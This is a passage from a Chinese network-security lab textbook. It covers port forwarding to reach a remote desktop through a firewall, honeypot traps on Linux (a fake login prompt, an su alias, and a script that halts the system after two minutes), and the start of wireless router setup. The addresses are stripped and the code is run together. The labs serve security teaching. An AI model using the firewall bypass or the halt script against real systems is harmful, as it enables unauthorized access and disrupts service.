端程序，參數(shù)-F表示將來自本機(jī)6789端口的數(shù)據(jù)全部轉(zhuǎn)發(fā)到:80，這個(gè)端口（6789）可以隨便選，只要本機(jī)目前沒有使用即可。然后netstat-an命令，發(fā)現(xiàn)6789端口已經(jīng)處于監(jiān)聽狀態(tài)。注意：該CMD窗口在后續(xù)實(shí)驗(yàn)過程中不要關(guān)閉。第4步：打開“遠(yuǎn)程桌面連接”對話框。入侵者(winxp)在自己的電腦中，單擊“開始”→“運(yùn)行”命令，輸入mstsc命令，打開“遠(yuǎn)程桌面連接”對話框，輸入:6789，單擊“連接”按鈕，如果不出意外，將出現(xiàn)如圖5.128所示的登錄窗口，此時(shí)表明成功地穿越了防火墻。5.16實(shí)例：蜜罐技術(shù)蜜罐就是一臺(tái)不作任何安全防范措施，并且連接互聯(lián)網(wǎng)的計(jì)算機(jī)。蜜罐與一般的計(jì)算機(jī)不同，它存在多種漏洞，并且管理員清楚這些漏洞，內(nèi)部運(yùn)行各種數(shù)據(jù)記錄程序，會(huì)記錄入侵者的所有操作和行為。蜜罐是一種資源，它的價(jià)值是被攻擊或攻陷。蜜罐是一種主動(dòng)防御技術(shù)。3．一個(gè)簡單蜜罐的例子操作系統(tǒng)為：RHEL/CentOS/Fedora。黑客入侵Linux系統(tǒng)一般有兩種方法：第一、猜測root口令，一旦獲得root口令，就會(huì)以root身份登錄。第二、先以普通用戶身份登錄，然后用su命令轉(zhuǎn)換成root。（1）設(shè)置陷阱，防止黑客以root身份登錄。在/root/.bash_profile文件后面追加如下一段程序：#fileclearecho"Loginincorrect"echoecho"Login:"readpif["$p"="123456"];then clearelse exitfi（2）設(shè)置陷阱，防止黑客用su命令轉(zhuǎn)換成root。在/etc/profile文件后面追加如下一條命令：aliassu='suztguang'（3）設(shè)置陷阱，中止黑客的root身份。如果黑客已經(jīng)成功以root身份登錄，就要啟動(dòng)登錄成功的陷阱。一旦root登錄，就啟動(dòng)一個(gè)計(jì)時(shí)器，正常的root登錄能夠停止計(jì)時(shí)，而非法入侵者因不知道何處有計(jì)時(shí)器，就無法停止計(jì)時(shí)，等計(jì)時(shí)到時(shí)，就觸發(fā)相應(yīng)的操作（如關(guān)機(jī)等）。陷阱程序/root/nonhacker.sh內(nèi)容如下：#!/bin/shtt=0while["$tt"-le120];do sleep1 tt=$(($tt+1))donehalt #2分鐘后關(guān)機(jī)在/root/.bashrc文件后面追加如下一條命令：.nonhacker.sh&正常root用戶登錄后，可以執(zhí)行jobs命令，然后執(zhí)行kill%n命令終止陷阱程序。5.17實(shí)例：無線網(wǎng)絡(luò)安全配置實(shí)例：無線網(wǎng)絡(luò)安全配置

實(shí)驗(yàn)環(huán)境

第1步：右鍵單擊【網(wǎng)上鄰居】，選擇【屬性】，然后右鍵單擊【本地連接】，選擇【屬性】，然后在【常規(guī)】選項(xiàng)卡里雙擊【Internet協(xié)議（TCP/IP）】，設(shè)置靜態(tài)IP地址2。第2步：打開IE瀏覽器，在地址欄中輸入，按回車鍵。在彈出的對話框中輸入用戶名和密碼，默認(rèn)的用戶名和密碼都是admin。單擊【確定】按鈕，出現(xiàn)路由器的界面，選擇【設(shè)置向?qū)А?，勾選【PPPoE】,單擊【下一步】按鈕。第3步：輸入ADSL上網(wǎng)賬號(hào)和密碼（安裝寬帶時(shí)，工作人員給的賬號(hào)和密碼）。單擊【下一步】按鈕.第4步：更改SSID號(hào)為“ZTG-WLAN”。在模式欄選擇自己的無線網(wǎng)卡模式（如802.11b、802.11g等，根據(jù)自己的情況而定）?，F(xiàn)在的路由器兼容802.11b、802.11g。單擊【下一步】按鈕。

注意：如